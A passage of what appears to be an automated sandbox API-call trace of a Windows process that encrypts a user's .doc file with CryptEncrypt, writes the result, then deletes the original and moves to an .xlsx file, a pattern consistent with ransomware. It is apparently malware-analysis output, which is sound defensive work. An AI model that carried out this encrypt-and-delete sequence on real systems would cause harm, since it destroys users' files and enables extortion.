lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0078.653] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48f6b88*, pdwDataLen=0x144e538*=0x23b6, dwBufLen=0x23c0 | out: pbData=0x48f6b88*, pdwDataLen=0x144e538*=0x23c0) returned 1 [0078.653] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.653] WriteFile (in: hFile=0x258, lpBuffer=0x48f2410*, nNumberOfBytesToWrite=0x23c0, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x48f2410*, lpNumberOfBytesWritten=0x144ef3c*=0x23c0, lpOverlapped=0x0) returned 1 [0078.655] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0078.655] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.655] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0078.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43cad60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0078.655] CryptDestroyKey (hKey=0x41ac780) returned 1 [0078.655] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.656] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.656] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.656] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0078.656] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0078.656] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0078.656] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.656] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0078.656] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0078.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0078.656] CryptReleaseContext (hProv=0x41a4fa8, dwFlags=0x0) returned 1 [0078.656] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.656] FreeLibrary (hLibModule=0x756e0000) returned 1 [0078.656] CloseHandle (hObject=0x298) returned 1 [0078.656] CloseHandle (hObject=0x258) returned 1 [0078.664] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\1ft lPPb9LICRxn6.doc", nBufferLength=0x7fff, lpBuffer=0x143ef38, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\1ft lPPb9LICRxn6.doc", lpFilePart=0x0) returned 0x35 [0078.664] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\1ft lPPb9LICRxn6.doc" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\1ft lppb9licrxn6.doc")) returned 0x20 [0078.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0078.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.664] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0078.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0078.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.665] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0078.665] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\1ft lPPb9LICRxn6.doc", lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ddc140, ftCreationTime.dwHighDateTime=0x1d5e4a6, ftLastAccessTime.dwLowDateTime=0x3766f560, ftLastAccessTime.dwHighDateTime=0x1d5efae, ftLastWriteTime.dwLowDateTime=0x3766f560, ftLastWriteTime.dwHighDateTime=0x1d5efae, nFileSizeHigh=0x0, nFileSizeLow=0x23b6, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="1ft lPPb9LICRxn6.doc", cAlternateFileName="1FTLPP~1.DOC")) returned 0x41ac600 [0078.665] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\1ft lPPb9LICRxn6.doc" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\1ft lppb9licrxn6.doc")) returned 1 [0078.720] FindNextFileW (in: hFindFile=0x41ac600, lpFindFileData=0x144ef80 | out: lpFindFileData=0x144ef80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22ddc140, ftCreationTime.dwHighDateTime=0x1d5e4a6, ftLastAccessTime.dwLowDateTime=0x3766f560, ftLastAccessTime.dwHighDateTime=0x1d5efae, ftLastWriteTime.dwLowDateTime=0x3766f560, ftLastWriteTime.dwHighDateTime=0x1d5efae, nFileSizeHigh=0x0, nFileSizeLow=0x23b6, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="1ft lPPb9LICRxn6.doc", cAlternateFileName="1FTLPP~1.DOC")) returned 0 [0078.720] FindClose (in: hFindFile=0x41ac600 | out: hFindFile=0x41ac600) returned 1 [0078.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0078.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0078.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0078.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431ded8 | out: hHeap=0x1780000) returned 1 [0078.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0078.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0078.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0078.720] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0078.720] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0078.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0078.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0078.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0078.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0078.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0078.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0078.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0078.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0078.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19e5358 | out: hHeap=0x1780000) returned 1 [0078.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0078.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0078.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0078.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0078.721] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.721] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0078.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0078.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0078.721] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0078.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0078.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0078.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0078.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0078.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0078.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0078.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3f8 [0078.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5358 [0078.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3f8 | out: hHeap=0x1780000) returned 1 [0078.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0078.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0078.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0078.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0078.722] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0078.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0078.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0078.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0078.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0078.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0078.723] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0078.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0078.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0078.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0078.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0078.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0078.723] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\6O-EvMa xQmykruQi.xlsx", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5ff20cd0, ftCreationTime.dwHighDateTime=0x1d5ecb2, ftLastAccessTime.dwLowDateTime=0x47d95710, ftLastAccessTime.dwHighDateTime=0x1d5ede4, ftLastWriteTime.dwLowDateTime=0x47d95710, ftLastWriteTime.dwHighDateTime=0x1d5ede4, nFileSizeHigh=0x0, nFileSizeLow=0x2262, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="6O-EvMa xQmykruQi.xlsx", cAlternateFileName="6O-EVM~1.XLS")) returned 0x41ac200 [0078.723] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0078.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0078.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0078.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0078.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0078.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ee0 [0078.724] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0078.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ee0 | out: hHeap=0x1780000) returned 1 [0078.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2460 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0078.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0078.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0078.724] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0078.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0078.725] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0078.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0078.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2480 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0078.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24c0 [0078.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24c0 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24d0 [0078.725] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.725] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0078.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0078.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0078.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0078.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.726] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0078.726] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0078.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0078.727] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0078.727] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 